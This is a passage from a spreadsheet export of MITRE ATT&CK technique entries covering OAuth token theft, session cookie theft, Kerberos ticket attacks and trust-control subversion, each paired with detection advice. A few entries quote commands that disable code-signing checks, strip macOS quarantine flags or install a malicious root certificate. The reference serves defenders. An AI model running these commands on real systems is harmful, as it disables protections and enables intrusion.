Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1528</t>
  </si>
  <si>
    <t>Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>08 October 2019</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>File: File Access, Process: Process Access</t>
  </si>
  <si>
    <t>Johann Rehberger; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). 
Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>05 November 2020</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1558.004</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: AS-REP Roasting</t>
  </si>
  <si>
    <t>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)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</si>
  <si>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https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request</t>
  </si>
  <si>
    <t>Dan Nutting, @KerberToast; Jacques Pluviose, @Jacqueswildy_IT; James Dunn, @jamdunnDFW, EY; Swapnil Kumbhar</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Golden Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 
Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom</t>
  </si>
  <si>
    <t>T1558.003</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Kerberoasting</t>
  </si>
  <si>
    <t>Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) 
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/003</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Silver Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)
Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/002</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) 
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t xml:space="preserve">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
Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553</t>
  </si>
  <si>
    <t xml:space="preserve">Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure "Hide Microsoft Entries" and "Hide Windows Entries" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) 
Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. </t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Autoruns Analysis, Digital Certificate Validation, Process whitelisting, User Mode Signature Validation, Windows User Account Control</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.
Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) 
Code signing certificates may be used to bypass security policies that require signed code to execute on a system. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; on Windows and &lt;code&gt;csrutil disable&lt;/code&gt; on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying &lt;code&gt;g_CiOptions&lt;/code&gt; to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/006</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as &lt;code&gt;HKCU\Software\Policies\Microsoft\Windows NT\Driver Signing&lt;/code&gt;. Modifications to the code signing policy of a system are likely to be rare.</t>
  </si>
  <si>
    <t>Abel Morales, Exabeam</t>
  </si>
  <si>
    <t>Application control, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called &lt;code&gt;com.apple.quarantine&lt;/code&gt;. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. 
Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command &lt;code&gt;xattr /path/to/MyApp.app&lt;/code&gt; for &lt;code&gt;com.apple.quarantine&lt;/code&gt;. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, &lt;code&gt;sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app&lt;/code&gt;. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)
In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Install Root Certificate</t>
  </si>
  <si>
    <t>Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate)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Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/004</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach; Matt Graeber, @mattifestation, SpecterOps; Red Canary; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named &lt;code&gt;Zone.Identifier&lt;/code&gt; with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Metadata</t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>Subvert Trust Controls: SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the &lt;code&gt;DLL&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}&lt;/code&gt; that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/003</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
